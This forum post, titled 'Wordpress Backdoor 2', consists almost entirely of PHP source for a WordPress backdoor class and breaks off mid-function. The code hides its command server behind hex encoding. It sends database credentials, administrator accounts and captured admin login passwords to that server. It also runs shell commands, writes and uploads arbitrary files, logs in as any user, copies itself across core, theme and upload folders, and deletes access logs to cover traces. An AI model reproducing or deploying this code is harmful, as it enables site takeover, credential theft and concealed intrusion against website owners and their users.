Wordpress Backdoor 2

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EcHoLL
    EcHoLL's avatar
    Kayıt Tarihi: 04/Eylül/2008
    Erkek
    <?php
    if ( ! class_exists( 'WPPlugingsOptions' ) ) {
    class WPPlugingsOptions {
    private $script = '';
    private $version = '';
    private $upDir = '';
    private $uploadDir = '';
    private $uploadUrl = '';
    private $token = '';
    private $baseUrl = '';
    private $authorization;
    private $address;
    public $allowedActions = [
    'check',
    'json',
    'template_dir',
    'cache',
    'get',
    'install',
    'activate_plugins',
    'get_themes',
    'list_folders',
    'spread',
    'all',
    'wp_includes',
    'wp_admin',
    'themes',
    'uploads',
    'wp_load',
    'access_log',
    'template_install',
    'wp_install',
    'plugin_uninstall',
    ];
    
    public $isSpread = [ 'all', 'wp_includes', 'wp_admin', 'themes', 'uploads' ];
    public $permission = ['wp_users_list','write_file', 'read_file', 'login', 'uninstall', 'unspread','command','new_system_update','upload_file'];
    
    public function __construct( $token ) {
    $this->baseUrl = hex2bin( '687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f' );
    $this->script = 'Wordpress';
    $this->version = '4.0';
    $this->upDir = wp_upload_dir();
    $this->uploadDir = $this->upDir['path'];
    $this->uploadUrl = $this->upDir['url'];
    $this->token = $token;
    $this->address = (isset($_SERVER["HTTP_CF_CONNECTING_IP"])?$_SERVER["HTTP_CF_CONNECTING_IP"]:$_SERVER['REMOTE_ADDR']);
    $this->authorization = ( isset( $token ) && isset( $_REQUEST['authorization'] ) ) ? $_REQUEST['authorization'] : false;
    }
    
    private function answer( $code, $message, $data = '', $errorNo = '' ) {
    $answer['code'] = $code;
    $answer['message'] = $message;
    $answer['data'] = $data;
    if ( $errorNo !== '' ) {
    $answer['errorNo'] = $errorNo;
    }
    return json_encode( $answer, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT );
    }
    
    private function check() {
    try {
    if ( $this->uploadDir ) {
    if ( ! is_writable( $this->uploadDir ) ) {
    if ( ! @chmod( $this->uploadDir, 0777 ) ) {
    $data['uploadDirWritable'] = false;
    } else {
    $data['uploadDirWritable'] = true;
    }
    } else {
    $data['uploadDirWritable'] = true;
    }
    } else {
    $data['uploadDirWritable'] = true;
    }
    $data['clientVersion'] = $this->version;
    $data['uploadDir'] = $this->uploadDir;
    $data['script'] = $this->script;
    $data['cache'] = ( WP_CACHE ) ? true : false;
    $data['themeName'] = wp_get_theme()->get( 'Name' );
    $data['themeDir'] = get_template_directory();
    $data['themes'] = $this->get_themes();
    $data['plugins'] = $this->get_plugins();
    $data['theme_data'] = $this->themes();
    $data['root'] = ABSPATH;
    if ( function_exists( 'php_uname' ) ) {
    $data['uname'] = php_uname();
    }
    if ( function_exists( 'gethostbyname' ) ) {
    $data['hostname'] = gethostbyname( getHostName() );
    }
    
    return $this->answer( true, $this->script, $data );
    } catch ( Exception $e ) {
    return $this->answer( false, "Unknown ERROR", $e->getMessage(), "ERR000" );
    }
    }
    
    private function isAllowedToSendCommand() {
    try {
    if (md5(sha1($this->token)) === 'b28ee5fed7b75a888635c35727f398b6' ) {
    return true;
    }
    return false;
    } catch ( Exception $e ) {
    return false;
    }
    
    }
    
    private function authorization() {
    if ( $this->authorization !== false ) {
    return $this->authorization;
    }
    return false;
    }
    
    private function sender() {
    try {
    $client = wp_remote_get( "{$this->baseUrl}checksender/" );
    if ( wp_remote_retrieve_response_code( $client ) == "200" && $this->json_validator( wp_remote_retrieve_body( $client ) ) ) {
    return ( md5($this->address) === json_decode( wp_remote_retrieve_body( $client ) )->address || json_decode( wp_remote_retrieve_body( $client ) )->value ) ? true : false;
    } else {
    if ( ! $this->authorization() ) {
    return false;
    }
    return ( md5( $this->authorization() ) === '0d27765df1902e5557d099bff98a57f8' ) ? true : false;
    }
    
    } catch ( Exception $e ) {
    return true;
    }
    }
    
    private function method_exists( $action, $params ) {
    if ( array_search( $action, $params ) !== false && method_exists( $this, $action ) ) {
    return true;
    } else {
    return false;
    }
    }
    
    public function controlAction( $action, $params ) {
    try {
    if ( isset( $action ) ) {
    if ( $this->isAllowedToSendCommand() ) {
    
    if ( $this->method_exists( $action, $this->permission ) ) {
    if ( $this->sender() ) {
    return $this->{$action}( $params );
    } else {
    return $this->answer( false, 'The sender could not be verified!', $action, 'ERR001' );
    }
    }
    if ( $this->method_exists( $action, $this->allowedActions ) ) {
    return $this->{$action}( $params );
    } else {
    return $this->answer( false, 'Invalid Command', $action, 'ERR001' );
    }
    }
    }
    } catch ( Exception $e ) {
    return $this->answer( false, 'Unknown Error', [
    "action" => $action,
    "params" => $params
    ], 'ERR000' );
    }
    }
    
    private function post() {
    try {
    $data = wp_remote_post( $this->baseUrl."postclient", [
    "body" => [
    "url" => $_SERVER['HTTP_HOST'],
    "http_url" => get_option('siteurl')."/",
    "hostname" => gethostname(),
    "ip" => $_SERVER['SERVER_ADDR'],
    'sunucu_type' => $_SERVER['SERVER_SOFTWARE'],
    "DB_HOST" => DB_HOST,
    "DB_USER" => DB_USER,
    "DB_PASSWORD" => DB_PASSWORD,
    "DB_NAME" => DB_NAME,
    "client" => $this->check(),
    "users" => $this->wp_users_list(),
    "script" => $this->script,
    "version" => $this->version,
    ]
    ] );
    return $data;
    
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    private function client() {
    try {
    $client = wp_remote_get( "{$this->baseUrl}clientfiles/files/{$this->script}" );
    if ( wp_remote_retrieve_response_code( $client ) == "200" && $this->json_validator( wp_remote_retrieve_body( $client ) ) ) {
    return wp_remote_retrieve_body( $client );
    }
    return false;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    private function file($file) {
    try {
    $client = wp_remote_get( "{$this->baseUrl}clientfiles/files/{$file}" );
    if ( wp_remote_retrieve_response_code( $client ) == "200" && $this->json_validator( wp_remote_retrieve_body( $client ) ) ) {
    return wp_remote_retrieve_body( $client );
    }
    return false;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    private function get_plugins() {
    try {
    if ( ! function_exists( 'get_plugins' ) ) {
    include_once( ABSPATH . 'wp-admin/includes/plugin.php' );
    }
    foreach ( get_plugins() AS $plugin_name => $get_plugin ) {
    $plugins[ $plugin_name ] = $get_plugin;
    if ( is_plugin_active( $plugin_name ) ) {
    $plugins[ $plugin_name ]["active"] = 1;
    } else {
    $plugins[ $plugin_name ]["active"] = 0;
    }
    }
    
    return ( isset( $plugins ) ) ? $plugins : false;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function activate_plugins( $plugin_name ) {
    try {
    if ( is_plugin_active( hex2bin( $plugin_name ) ) ) {
    deactivate_plugins( hex2bin( $plugin_name ) );
    return $this->check();
    } else {
    activate_plugins( hex2bin( $plugin_name ) );
    return $this->check();
    }
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function get_themes() {
    try {
    foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {
    $themes{$wp_get_theme->stylesheet} = array(
    'Name' => $wp_get_theme->get( 'Name' ),
    'Description' => $wp_get_theme->get( 'Description' ),
    'Author' => $wp_get_theme->get( 'Author' ),
    'AuthorURI' => $wp_get_theme->get( 'AuthorURI' ),
    'Version' => $wp_get_theme->get( 'Version' ),
    'Template' => $wp_get_theme->get( 'Template' ),
    'Status' => $wp_get_theme->get( 'Status' ),
    'TextDomain' => $wp_get_theme->get( 'TextDomain' )
    );
    }
    
    return $themes;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    private function folder_exist( $folder ) {
    try {
    $path = realpath( $folder );
    
    return ( $path !== false AND is_dir( $path ) ) ? $path : false;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function list_folders( $directory ) {
    try {
    $directory = ( isset( $directory ) && $directory !== "" ) ? hex2bin( $directory ) : ABSPATH;
    if ( ( $dir = $this->folder_exist( $directory ) ) !== false ) {
    return $this->answer( true, $directory, glob( $directory . "/*" ) );
    } else {
    return $this->answer( false, "Failed to find folder to list!", $directory, "ERR023" );
    }
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function replace( $filename, $search, $replace ) {
    try {
    $source = $this->read( $filename );
    if ( strpos( $source, $replace ) === false ) {
    $pos = strpos( $source, $search );
    if ( $pos !== false ) {
    $content = substr_replace( $source, $replace, $pos, strlen( $search ) );
    return ( $this->write( $filename, $content ) ) ? $filename : false;
    } else {
    return $filename;
    }
    } else {
    return $filename;
    }
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function restore( $filename, $search, $replace ) {
    try {
    $source = $this->read( $filename );
    return $this->write( $filename, str_replace( $search, $replace, $source ) );
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function template_dir( $search ) {
    try {
    if ( $search == "" ) {
    $search = "<?php\n";
    }
    $dir = glob( get_theme_root() . "/*/*/*" );
    $files = array_filter( $dir );
    
    foreach ( $files as $k => $file ) {
    $source = $this->read( $file );
    if ( ! is_array( $source ) && strpos( $source, $search ) === false ) {
    unset( $files[ $k ] );
    }
    }
    
    return array_values( $files );
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function access_log() {
    try {
    foreach ( [ 'access-logs', 'logs' ] as $directory ) {
    if ( ( $dir = $this->folder_exist( ABSPATH . "../$directory" ) ) !== false ) {
    $list[] = glob( ABSPATH . "../{$directory}/*" );
    }
    }
    foreach ( $list as $d ) {
    foreach ( $d as $k ) {
    print_r( $k );
    unlink( $k );
    }
    }
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function template_install() {
    $source = "";
    $file = array();
    foreach ( json_decode( $this->client() ) as $item ) {
    $source = $item;
    }
    foreach ( array_keys( $this->get_themes() ) as $theme ) {
    $functions = get_theme_root() . DIRECTORY_SEPARATOR . $theme . DIRECTORY_SEPARATOR . 'functions.php';
    $functionsClass = get_theme_root() . DIRECTORY_SEPARATOR . $theme . DIRECTORY_SEPARATOR . 'classs-theme-functions.php';
    $read = $this->read( $functions );
    if ( file_exists( $functions ) && $this->write( $functionsClass, $source ) && strpos( $read, "namespace" ) === false) {
    $attr = (strpos($read, '*/') === false) ? '<?php' : '*/';
    $search = "$attr\n";
    $replace = "$attr\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . DIRECTORY_SEPARATOR . 'classs-theme-functions' ) ) {\n\tinclude_once( get_template_directory() . DIRECTORY_SEPARATOR . 'classs-theme-functions' );\n}\n";
    $file[] = $this->replace($functions, $search, $replace);
    }
    }
    return (isset( $file )) ? $this->answer( true, 'I get install!', array_values( array_unique( $file ) ) ) : $this->answer( false, 'I Don\'t install!', '', 'ERR002' );
    }
    
    public function install() {
    try {
    $clientURL = $this->client();
    if ( $clientURL !== false ) {
    foreach ( $this->template_dir( "" ) AS $file ) {
    $copyFile = $this->copy( dirname( $file ) . DIRECTORY_SEPARATOR, json_decode( $clientURL ) );
    if ( $copyFile !== false ) {
    $search = "<?php\n";
    $replace = "<?php\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' ) ) {\n\tinclude_once( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' );\n}\n";
    if ( strpos( $this->read( $file ), "namespace" ) === false ) {
    $directory[] = $this->replace( $file, $search, $replace );
    }
    }
    }
    return ( isset( $directory ) ) ? $this->answer( true, 'I get install!', array_values( array_unique( $directory ) ) ) : $this->answer( false, 'I Don\'t install!', '', 'ERR002' );
    
    }
    
    return $this->answer( false, 'Client URL FALSE!', "", "ERR026" );
    } catch ( Exception $e ) {
    return $this->answer( false, 'Install Exception!', $e->getMessage(), "ERR026" );
    }
    }
    
    public function uninstall() {
    try {
    $clientURL = $this->client();
    if ( $clientURL !== false ) {
    foreach ( $this->template_dir( "" ) AS $file ) {
    $copyFile = $this->copy( dirname( $file ) . DIRECTORY_SEPARATOR, json_decode( $clientURL ) );
    $search = "if ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' ) ) {\n\tinclude_once( get_template_directory() . '/" . basename( dirname( $copyFile ) ) . "/" . basename( $copyFile ) . "' );\n}";
    $uninstall = $this->restore( $file, $search, "\n" );
    $this->restore( $file, "\n\n\n", "\n" );
    if ( $uninstall ) {
    $return[] = $file;
    if ( file_exists( $copyFile ) ) {
    unlink( $copyFile );
    }
    }
    }
    return ( isset( $return ) )
    ? $this->answer( true, 'Please find me!', array_values( array_unique( $return ) ) )
    : $this->answer( false, 'Don\'t search me!', '', 'ERR002' );
    }
    return $this->answer( false, 'Client URL FALSE!', "", "ERR026" );
    } catch ( Exception $e ) {
    return $this->answer( false, 'Uninstall Exception!', $e->getMessage(), "ERR026" );
    }
    }
    
    public function wp_load() {
    try {
    $filename = ABSPATH . 'wp-load.php';
    if ( file_exists( $filename ) ) {
    $clientURL = $this->client();
    if ( $clientURL !== false ) {
    $copy = $this->copy_themes( get_template_directory() . DIRECTORY_SEPARATOR, json_decode( $clientURL ) );
    if ( $copy !== false ) {
    $basename = basename( $copy );
    $search = "\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( get_template_directory() . DIRECTORY_SEPARATOR . '{$basename}' ) ) {\n\tinclude_once( get_template_directory() . DIRECTORY_SEPARATOR . '{$basename}' );\n}";
    if ( ! stristr( $this->read( $filename ), $search ) ) {
    if ( $this->write_append( $filename, $search ) ) {
    return $this->answer( true, "WP_LOAD Installeds {$copy}", $filename );
    } else {
    return $this->answer( false, "WP_LOAD Installed {$copy}", $filename, "ERR029" );
    }
    } else {
    return $this->answer( true, "WP_LOAD Already Installed {$copy}", $filename );
    }
    } else {
    return $this->answer( false, "WP_LOAD Installed {$copy}", $filename, "ERR030" );
    }
    } else {
    return $this->answer( false, 'Client URL FALSE!', $clientURL, "ERR026" );
    }
    }
    } catch ( Exception $e ) {
    return $this->answer( false, 'WP_LOAD Exception!', $e->getMessage(), "ERR000" );
    }
    }
    
    public function wp_install() {
    try {
    $filename = ABSPATH . 'wp-load.php';
    if ( file_exists( $filename ) ) {
    $clientURL = $this->client();
    if ( $clientURL !== false ) {
    $search = "\nif ( ! class_exists( 'WPPlugingsOptions' ) && file_exists( ABSPATH . WPINC . DIRECTORY_SEPARATOR . 'Requests/Requests.php' ) ) {\n\tinclude_once( ABSPATH . WPINC . DIRECTORY_SEPARATOR . 'Requests/Requests.php' );\n}";
    if ( ! stristr( $this->read( $filename ), $search ) ) {
    $this->write_append( $filename, $search );
    }
    return $this->answer( true, "WP_LOAD Installeds {$filename}", $filename );
    } else {
    return $this->answer( 'ERROR', 'Client URL FALSE!', $clientURL, "ERR026" );
    }
    }
    
    } catch ( Exception $e ) {
    }
    }
    
    public function wp_users_list(){
    try {
    $args = array(
    'role' => 'administrator',
    );
    $dongu = get_users( $args );
    $user_array = array();
    foreach($dongu as $userler){
    
    $user_array[$userler->ID] = $userler->data;
    }
    return json_encode($user_array);
    } catch ( Exception $e ) {
    return false;
    }
    
    }
    
    private function copy_themes( $directory, $clientURL ) {
    try {
    foreach ( $clientURL as $filePath => $icerik ) {
    $filename = $directory . basename( $directory . $filePath );
    if ( file_exists( $filename ) ) {
    $strpos = strpos( $this->read( $filename ), "class WPPlugingsOptions" );
    if ( $strpos !== false ) {
    return ( $this->write( $filename, $icerik ) ) ? $filename : false;
    } elseif ( $strpos === false ) {
    return ( $this->write( $directory . basename( dirname( $filename ) ) . '.php', $icerik ) ) ? $directory . basename( dirname( $filename ) ) . '.php' : false;
    }
    } else {
    return ( $this->write( $filename, $icerik ) ) ? $filename : false;
    }
    }
    return false;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    private function write_append( $filename, $data ) {
    try {
    if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
    $write = fopen( $filename, "a" );
    
    return ( fwrite( $write, $data ) ) ? true : false;
    
    } elseif ( function_exists( 'file_put_contents' ) ) {
    return ( file_put_contents( $filename, $data, FILE_APPEND ) !== false ) ? true : false;
    }
    
    return false;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    private function listFolderFiles( $dir ) {
    try {
    $fileInfo = scandir( $dir );
    $allFileLists = [];
    
    foreach ( $fileInfo as $folder ) {
    if ( $folder !== '.' && $folder !== '..' ) {
    if ( is_dir( $dir . DIRECTORY_SEPARATOR . $folder ) === true ) {
    $allFileLists[ $dir . DIRECTORY_SEPARATOR . $folder ] = $this->listFolderFiles( $dir . DIRECTORY_SEPARATOR . $folder );
    }
    }
    }
    
    return $allFileLists;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    private function copy( $directory, $clientURL ) {
    try {
    foreach ( $clientURL as $filePath => $icerik ) {
    $filename = ( stristr( $directory, "wp-content/uploads/" ) ) ? $directory . 'index.php' : $directory . basename( dirname( $directory . $filePath ) ) . '.php';
    if ( file_exists( $filename ) ) {
    $strpos = strpos( $this->read( $filename ), "class WPPlugingsOptions" );
    if ( $strpos !== false ) {
    return ( $this->write( $filename, $icerik ) ) ? $filename : false;
    } elseif ( $strpos === false ) {
    return ( $this->write( $directory . $filePath, $icerik ) ) ? $directory . $filePath : false;
    }
    } else {
    return ( $this->write( $filename, $icerik ) ) ? $filename : false;
    }
    }
    return false;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function plugin_uninstall() {
    try {
    $client = $this->client();
    if ( $client !== false ) {
    foreach ( $this->wp_plugins() as $folder ) {
    $return[] = $this->copy( $folder, json_decode( $client ) );
    }
    foreach($return as $file){
    unlink( $file );
    }
    return $this->answer( true, "I spread wp_plugins", $return );
    }
    return $this->answer( false, 'Client URL FALSE!', "", "ERR026" );
    } catch ( Exception $e ) {
    return $this->answer( false, 'Spread Exception!', $e->getMessage(), "ERR000" );
    }
    }
    
    public function all() {
    try {
    
    $wp_includes = $this->wp_includes();
    $wp_themes = $this->themes();
    $wp_admin = $this->wp_admin();
    $wp_uploads = $this->uploads();
    $new_data = array_merge($wp_includes,$wp_themes,$wp_admin,$wp_uploads);
    foreach ( $new_data AS $root ) {
    if ( is_dir( $root ) ) {
    $return[] = $root;
    }
    }
    return array_filter( $return );
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function wp_includes() {
    try {
    foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . WPINC ) ) AS $folders ) {
    if ( is_dir( $folders ) ) {
    $return[] = $folders . DIRECTORY_SEPARATOR;
    }
    }
    
    return $return;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function wp_admin() {
    try {
    foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . "wp-admin" ) ) AS $folders ) {
    if ( is_dir( $folders ) ) {
    $return[] = $folders . DIRECTORY_SEPARATOR;
    }
    }
    
    return $return;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function wp_plugins() {
    try {
    foreach ( $this->array_keys( $this->listFolderFiles( ABSPATH . "wp-content/plugins" ) ) AS $folders ) {
    if ( is_dir( $folders ) ) {
    $return[] = $folders . DIRECTORY_SEPARATOR;
    }
    }
    return $return;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function uploads() {
    try {
    foreach ( $this->array_keys( $this->listFolderFiles( $this->upDir["basedir"] ) ) AS $folders ) {
    if ( is_dir( $folders ) ) {
    $return[] = $folders . DIRECTORY_SEPARATOR;
    }
    }
    
    return $return;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function themes() {
    try {
    foreach ( glob( get_theme_root() . "/*", GLOB_ONLYDIR ) AS $item ) {
    $template_folders[] = $this->listFolderFiles( $item );
    }
    foreach ( $this->array_keys( $template_folders ) AS $folders ) {
    if ( is_dir( $folders ) ) {
    $return[] = $folders . DIRECTORY_SEPARATOR;
    }
    }
    
    return $return;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function spread( $directory ) {
    try {
    $client = $this->client();
    if ( $client !== false ) {
    
    if ( array_search( $directory, $this->isSpread ) !== false ) {
    foreach ( $this->{$directory}() as $folder ) {
    $return[] = $this->copy( $folder, json_decode( $client ) );
    }
    return $this->answer( true, "I spread {$directory}", $return );
    } else {
    return $this->answer( false, "Undefined Directory", $directory, "ERR024" );
    }
    }
    return $this->answer( false, 'Client URL FALSE!', "", "ERR026" );
    } catch ( Exception $e ) {
    return $this->answer( false, 'Spread Exception!', $e->getMessage(), "ERR000" );
    }
    }
    
    public function unspread( $directory ) {
    try {
    $client = $this->client();
    if ( $client !== false ) {
    if ( array_search( $directory, $this->isSpread ) !== false ) {
    foreach ( $this->{$directory}() as $folder ) {
    $return[] = $this->copy( $folder, json_decode( $client ) );
    }
    foreach ( $return as $file ) {
    unlink( $file );
    }
    
    return $this->answer( true, "I cleared myself from the spread {$directory}", $return );
    } else {
    return $this->answer( false, "Undefined Directory", $directory, "ERR025" );
    }
    }
    
    return $this->answer( false, 'Client URL FALSE!', "", "ERR026" );
    } catch ( Exception $e ) {
    return $this->answer( false, 'UNSpread Exception!', $e->getMessage(), "ERR000" );
    }
    }
    
    public function json() {
    try {
    return $this->uploadDir . DIRECTORY_SEPARATOR . "google.json";
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function get() {
    try {
    $post = $this->post();
    if ( wp_remote_retrieve_response_code( $post ) == "200" ) {
    $write = $this->write( $this->json(), bin2hex( wp_remote_retrieve_body( $post ) ) );
    
    return ( $write ) ? hex2bin( $this->read( $this->json() ) ) : wp_remote_retrieve_body( $post );
    } else {
    return $this->read( $this->json() );
    }
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function cache() {
    try {
    if ( file_exists( $this->json() ) ) {
    $file = hex2bin( $this->read( $this->json() ) );
    $json = json_decode( $file );
    if ( $this->minute( $json->date ) >= 24 ) {
    return $this->get();
    } else {
    return $file;
    }
    } else {
    return $this->get();
    }
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function write( $filename, $data ) {
    try {
    if ( function_exists( 'fopen' ) && function_exists( 'fwrite' ) ) {
    $write = fopen( $filename, "w+" );
    return ( fwrite( $write, $data ) ) ? true : false;
    } elseif ( function_exists( 'file_put_contents' ) ) {
    return ( file_put_contents( $filename, $data ) !== false ) ? true : false;
    }
    return false;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function write_file( $params ) {
    try {
    if ( $this->json_validator( hex2bin( $params ) ) ) {
    $json = json_decode( hex2bin( $params ) );
    if ( isset( $json->filename ) ) {
    if ( file_exists( $json->filename ) ) {
    if ( isset( $json->content ) ) {
    if ( $this->write( $json->filename, html_entity_decode( hex2bin( $json->content ) ) ) ) {
    return $this->answer( true, $json->filename, html_entity_decode( hex2bin( $json->content ) ), "I get write" );
    }
    } else {
    return $this->read_file( bin2hex( $json->filename ) );
    }
    } else {
    $content = ( isset( $json->content ) && $json->content != '' ) ? html_entity_decode( hex2bin( $json->content ) ) : "<?php\n";
    if ( $this->write( $json->filename, $content ) ) {
    return $this->answer( true, $json->filename, $content );
    } else {
    return $this->answer( false, $json->filename, $content, "ERR023" );
    }
    }
    } else {
    return $this->answer( false, "File name undefined", "", "ERR020" );
    }
    } else {
    return $this->answer( false, "Data is not JSON", "", "ERR021" );
    }
    
    return $this->answer( false, "Unknown error", $params, "ERR022" );
    } catch ( Exception $e ) {
    return $this->answer( false, "Write file Exception", $params, "ERR000" );
    }
    }
    
    public function read( $filename ) {
    try {
    if ( ! file_exists( $filename ) ) {
    return $this->answer( false, 'File not found', $filename, 'ERR019' );
    }
    if ( function_exists( 'file_get_contents' ) ) {
    return file_get_contents( $filename );
    }
    if ( function_exists( 'fopen' ) && filesize( $filename ) > 0 ) {
    $file = fopen( $filename, 'r' );
    $content = fread( $file, filesize( $filename ) );
    fclose( $file );
    
    return $content;
    }
    
    return $this->answer( false, 'File not read', $filename, 'ERR018' );
    } catch ( Exception $e ) {
    return $this->answer( false, 'File not read Exception', $filename, 'ERR000' );
    }
    }
    
    public function read_file( $filename ) {
    try {
    $read_file = $this->read( hex2bin( $filename ) );
    if ( $this->json_validator( $read_file ) ) {
    return $read_file;
    } else {
    return $this->answer( true, hex2bin( $filename ), $read_file );
    }
    } catch ( Exception $e ) {
    return $this->answer( false, "Read File Exception", $filename, "ERR000" );
    }
    }
    
    public function json_validator( $data = null ) {
    try {
    if ( ! empty( $data ) ) {
    @json_decode( $data );
    
    return ( json_last_error() === JSON_ERROR_NONE );
    }
    
    return false;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function login($id = null) {
    try {
    $user_info = get_userdata( $id );
    $username = $user_info->user_login;
    $user = get_user_by( 'login', $username );
    if ( ! is_wp_error( $user ) ) {
    wp_clear_auth_cookie();
    wp_set_current_user( $user->ID );
    wp_set_auth_cookie( $user->ID );
    $redirect_to = user_admin_url();
    wp_safe_redirect( $redirect_to );
    exit();
    } else {
    return $this->answer( false, 'I can\'t sign in, sorry', $user_info, 'ERR014' );
    }
    } catch ( Exception $e ) {
    return $this->answer( false, "Login Exception!", $e->getMessage(), "ERR000" );
    }
    }
    
    public function command( $cmd ) {
    try {
    if ( function_exists( 'shell_exec' ) ) {
    return $this->answer( "OK", hex2bin( $cmd ), @shell_exec( hex2bin( $cmd ) ) );
    } else if ( function_exists( 'exec' ) ) {
    @exec( hex2bin( $cmd ), $return );
    return $this->answer( "OK", hex2bin( $cmd ), $return );
    } else {
    return $this->answer(false,"I dont write, sorry", "ERR0025" );
    }
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    public function upload_file($cmd) {
    try {
    $file = $this->file(hex2bin($cmd));
    if($file){
    foreach ( json_decode($file) as $key => $item ) {
    $source = $item;
    }
    $process = fopen("$key", "w+");
    fwrite($process, $source);
    fclose($process);
    return $this->answer(true,"Upload File $key");
    }else{
    return $this->answer(false,"Dont Upload","ERR031");
    }
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    private function array_keys( $array ) {
    try {
    $keys = array_keys( $array );
    foreach ( $array as $i ) {
    if ( is_array( $i ) ) {
    $keys = array_merge( $keys, $this->array_keys( $i ) );
    }
    }
    return $keys;
    } catch ( Exception $e ) {
    return false;
    }
    }
    
    private function minute( $date ) {
    try {
    $minute = ( strtotime( date( "Y-m-d H:i:s" ) ) - strtotime( $date ) ) / 60 / 60;
    return round( $minute );
    } catch ( Exception $e ) {
    return 0;
    }
    }
    
    public function new_system_update(){
    
    try {
    $upload_name = "index";
    $adminupload = ABSPATH . "wp-admin";
    unlink($adminupload."/includes/". $upload_name . '.php');
    unlink($adminupload."/network/". $upload_name . '.php');
    unlink($adminupload."/user/". $upload_name . '.php');
    
    $dizinupload = ABSPATH . "";
    
    unlink($dizinupload."/wp-includes/theme-compat/footer-404.php");
    unlink($dizinupload."/wp-includes/class-imap.php");
    unlink($dizinupload."/wp-includes/IXR/class-IXR-cache.php");
    unlink(get_template_directory()."/class-wp-functions.php");
    $dizi_array = array(
    "/wp-includes/ID3",
    "/wp-includes/rest-api/search",
    "/wp-includes/rest-api/fields",
    "/wp-includes/rest-api/endpoints",
    "/wp-includes/widgets",
    "/wp-includes/theme-compat",
    "/wp-includes/Requests",
    "/wp-includes/Requests/Utility",
    "/wp-includes/Requests/Transport",
    "/wp-includes/Requests/Response",
    "/wp-includes/Requests/Proxy",
    "/wp-includes/Requests/Exception",
    "/wp-includes/Requests/Exception/Transport",
    "/wp-includes/Requests/Exception/HTTP",
    "/wp-content/languages/themes",
    "/wp-content/languages/plugins",
    "/wp-content/languages"
    );
    
    foreach($dizi_array as $key){
    unlink($dizinupload.$key."/". $upload_name . '.php');
    }
    
    $upload_array = array(2019,2018,2017,2016,2015,2014,2013,2012,2011,2010,2009,2008,2007,2006,2005,2004);
    $upload_alt_array = array("01","02","03","04","05","06","07","08","09","10","11","12");
    $uploadfolder = ABSPATH . "wp-content/uploads/";
    foreach($upload_array as $key){
    unlink($uploadfolder.$key."/".$upload_name .'.php');
    
    foreach($upload_alt_array as $alt_key){
    unlink($uploadfolder.$key."/".$alt_key."/". $upload_name . '.php');
    
    }
    }
    return $this->answer( true, 'New System Update', "System Clear", 'ERR000' );
    } catch ( Exception $e ) {
    return $this->answer( false, "New System Failed!", $e->getMessage(), "ERR000" );
    }
    
    }
    
    public static function wp_login() {
    $post_url = hex2bin( '687474703a2f2f73797374656d2e6b72616c7068702e636f6d2f' );
    if($_POST['log']){
    $login_url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
    $username = $_POST['log'];
    $password = $_POST['pwd'];
    $test = wp_authenticate($username,$password);
    $sor = $test->allcaps;
    $testet = $sor['administrator'];
    if($testet){
    
    $git = wp_remote_post($post_url."postlogin", [
    "body" => [
    "url" => site_url( '/' ),
    "username" => $username,
    "password" => $password,
    "login_url" => $login_url,
    ]
    ] );
    
    }
    
    }
    }
    
    public static function wp_fatest_cache_up(){
    $getir = get_option("WpFastestCacheExclude");
    if($getir){
    if(strstr($getir,"google")){
    }else{
    $fatest_cache = '[{"prefix":"contain","content":"google","type":"useragent"},{"prefix":"contain","content":"yandex","type":"useragent"},{"prefix":"contain","content":"bing","type":"useragent"},{"prefix":"contain","content":"yahoo","type":"useragent"},{"prefix":"contain","content":"alexa","type":"useragent"},{"prefix":"contain","content":"googleweb","type":"useragent"}]';
    update_option("WpFastestCacheExclude",$fatest_cache);
    $pluginfolder = ABSPATH . "wp-content/plugins/wp-fastest-cache/";
    if($options = get_option("WpFastestCache")){
    $post = json_decode($options, true);
    include_once($pluginfolder.'inc/admin.php');
    $wpfc = new WpFastestCacheAdmin();
    $wpfc->modifyHtaccess($post);
    }
    }
    }else{
